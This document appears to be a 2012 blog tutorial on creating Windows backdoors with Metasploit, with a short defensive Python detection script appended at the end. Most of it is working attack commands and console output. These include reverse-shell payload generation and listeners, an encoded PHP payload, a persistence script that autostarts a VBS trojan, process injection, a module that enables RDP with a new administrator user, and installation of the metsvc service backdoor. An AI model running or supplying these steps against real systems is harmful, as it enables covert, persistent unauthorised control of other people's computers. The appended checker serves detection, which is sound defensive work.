Metasploit BackDoor For Windows
Source: brk.dis9.com  Author: dis9  Published: 2012-03-22

The Metasploit Framework (MSF) was released as open source in 2003 and is a freely available development framework. It is a powerful open-source platform for developing, testing and using malicious code; this environment provides a reliable platform for penetration testing, shellcode writing and vulnerability research.
This extensible model integrates payload control, encoders, NOP generators and exploits, making the Metasploit Framework a route for researching high-risk vulnerabilities. It bundles the common overflow vulnerabilities and popular shellcode for each platform and is constantly updated. The latest version of MSF contains more than 750 exploits for popular operating systems and applications, plus N shellcodes. As a security tool it plays a role in security assessments that cannot be ignored, and it provides strong support for automated vulnerability discovery and timely detection of system vulnerabilities.
It also provides several kinds of backdoor; let's take a quick look at them now.

msfpayload as shellcode

List them all; there are currently 248 payloads:

root@Dis9Team:/home/brk# msfpayload -l


It can generate a wide variety of payloads.
Put simply, here is one:

A normal Windows backdoor

This uses windows/meterpreter/reverse_tcp:

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


Once it is generated, get the target to run it; on our side we need to start a listener to receive the shell:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >

Others (php, asp, jsp, dll)

Pick the msfpayload name you want, generate it, you know the rest. For example:
Dll:


Reference: The DLL Hijacking Tutorial
php:

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

JAVA:

./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

An abnormal Windows backdoor

Where there is normal there is of course abnormal, for example reverse_https and reverse_http.
Everyone knows these sail straight through firewalls. If the connection is unexpectedly interrupted after generation, we can connect again later, just like Gray Pigeon (灰鸽子). The default is 5 minutes; you can set the SessionExpirationTimeout option to 0, which means the connection never expires.

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Now let's run it.

msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800

Success. I clicked it a couple of times, so there are two shells; let's kill the shell sessions.

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf  exploit(handler) >

Keep listening:

msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

We got the shell again.

persistence

This one is a post-exploitation module; the prerequisite is that you already have a shell session. It creates a persistent backdoor that starts as a system service.
First connect to the shell and look at the help:

msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Now let's run it:

meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

It was installed into c:\windows and connects back every 5 seconds to port 1234 on our machine, 5.5.5.1.
Now let's see what happened on the target machine:

There are a few extra VBS files; that is the trojan. It runs automatically whenever the machine reboots or a user logs on. So how do we remove it afterwards?

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc

Run it:

meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs

payload inject

Inject another payload. For example:

msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >

TCP Shell Session

Set up the backdoor according to which scripting environment is installed on the target; the choices are auto, ruby, python, perl and bash, and it works on Linux too.
Since I have none of them installed... you know the rest.

msf  post(system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >

pxexploit

See the module description:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
I don't have the setup for this one, so no demo.

Automatic 3389 (RDP)

Very simple: go into the module and set the username, password and port.

msf  post(enable_rdp) > show options

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] Setting user account for logon
[*] 	Adding User: test with Password: test
[*] 	Adding User: test to local group 'Remote Desktop Users'
[*] 	Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >

Let's check whether 3389 is open:

msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!

It's open. Of course you can also switch to another port.

Inject in Memory

This one is awesome: in-memory injection.

msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >

We successfully got a shell.

metsvc door

This one starts as a system service.
First, get the tool:

brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$

Then upload the files:

meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >

Install the service:

meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>

Then, you know the rest:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >
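As an added example from the defender's side (not code from the article or from Metasploit), the Python below checks a host for the artifacts that the persistence script, enable_rdp and metsvc steps above leave behind: a random-named .vbs in c:\windows or a Temp directory, the metsvc files and service, tcp/31337 and tcp/3389 listening, and new members of the Administrators and Remote Desktop Users groups. The inventory layout and the sample data are constructed for this example.

```python
"""Defender-side checks for the artifacts left by the techniques above.

Constructed sample data only. The inventory layout (files, services,
listening ports, group members) is an assumption made for this example;
it is not a Metasploit or Windows export format.
"""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (severity, message)

# `run persistence` drops a random-named .vbs (page: c:\windows\\FBEzRzQYpXKFg.vbs);
# its help text says %TEMP% is used when -L is not given.
PERSISTENCE_VBS = re.compile(r"^[a-z]{8,16}\.vbs$", re.IGNORECASE)

# Files uploaded for the metsvc door, the service it installs, and its bind port.
METSVC_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.dll"}
METSVC_SERVICE = "metsvc"
METSVC_PORT = 31337

# enable_rdp opens 3389 and adds the created user to these two local groups.
RDP_PORT = 3389
RDP_GROUPS = {"administrators", "remote desktop users"}


def normalize(path: str) -> str:
    """Lower-case a Windows path and collapse mixed or doubled separators
    (the transcripts above mix forward slashes, backslashes and doubled separators)."""
    return re.sub(r"[\\/]+", r"\\", path.strip()).lower().rstrip("\\")


def split_path(path: str) -> Tuple[str, str]:
    """Return (directory, file name), both normalized."""
    head, _, tail = normalize(path).rpartition("\\")
    return head, tail


def check_files(files: List[str]) -> List[Finding]:
    """Flag the persistence dropper and any metsvc component on disk."""
    findings: List[Finding] = []
    metsvc_seen = set()
    for path in files:
        directory, name = split_path(path)
        if name in METSVC_FILES:
            metsvc_seen.add(name)
        drop_dir = directory == r"c:\windows" or directory.endswith("\\temp")
        if drop_dir and PERSISTENCE_VBS.match(name):
            findings.append(("high", f"random-named VBS dropper: {path}"))
    if metsvc_seen:
        findings.append(("high", "metsvc components on disk: " + ", ".join(sorted(metsvc_seen))))
    return findings


def check_services(services: Dict[str, str]) -> List[Finding]:
    """services maps service name -> binary path; flag the metsvc door by either."""
    findings: List[Finding] = []
    for name, binary in services.items():
        _, exe = split_path(binary)
        if name.lower() == METSVC_SERVICE or exe in METSVC_FILES:
            findings.append(("high", f"service {name!r} runs {exe} (metsvc door)"))
    return findings


def check_ports(listening_tcp: List[int], rdp_expected: bool) -> List[Finding]:
    """metsvc listens on its bind port; 3389 is a finding only where RDP is not expected."""
    findings: List[Finding] = []
    if METSVC_PORT in listening_tcp:
        findings.append(("high", f"tcp/{METSVC_PORT} listening (metsvc bind port)"))
    if RDP_PORT in listening_tcp and not rdp_expected:
        findings.append(("medium", f"tcp/{RDP_PORT} listening but RDP is not expected here"))
    return findings


def check_groups(groups: Dict[str, List[str]], baseline: Dict[str, List[str]]) -> List[Finding]:
    """Flag members added to Administrators / Remote Desktop Users since the baseline."""
    findings: List[Finding] = []
    for group, members in groups.items():
        if group.lower() not in RDP_GROUPS:
            continue
        known = {m.lower() for m in baseline.get(group, [])}
        for member in members:
            if member.lower() not in known:
                findings.append(("medium", f"new member {member!r} in local group {group!r}"))
    return findings


def scan(inventory: dict, baseline_groups: dict, rdp_expected: bool = False) -> List[Finding]:
    """Run every check over one host inventory and return the combined findings."""
    return (check_files(inventory["files"])
            + check_services(inventory["services"])
            + check_ports(inventory["listening_tcp"], rdp_expected)
            + check_groups(inventory["groups"], baseline_groups))


# Constructed sample: a host after the persistence, enable_rdp and metsvc steps ran.
SAMPLE_INVENTORY = {
    "files": [
        r"C:\WINDOWS\explorer.exe",
        r"c:\windows\\FBEzRzQYpXKFg.vbs",
        r"c:/windows/\metsvc.exe",
        r"c:/windows/\metsvc-server.exe",
        r"c:/windows/\metsrv.dll",
        r"C:\Documents and Settings\brk\Local Settings\Temp\setup.log",
    ],
    "services": {"Spooler": r"C:\WINDOWS\system32\spoolsv.exe",
                 "metsvc": r"c:\windows\metsvc.exe"},
    "listening_tcp": [135, 445, 3389, 31337],
    "groups": {"Administrators": ["Administrator", "brk", "test"],
               "Remote Desktop Users": ["test"],
               "Users": ["brk", "test"]},
}
SAMPLE_BASELINE_GROUPS = {"Administrators": ["Administrator", "brk"],
                          "Remote Desktop Users": []}

if __name__ == "__main__":
    for severity, message in scan(SAMPLE_INVENTORY, SAMPLE_BASELINE_GROUPS):
        print(f"[{severity}] {message}")
```

The cleanup resource files the modules print (the persistence .rc and the enable_rdp loot file) undo only what the module itself did; these checks are for the case where the host is found without that context.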

Closing words

There is a lot more I would like to cover, but no time to set up the environments, so I'll stop here.


 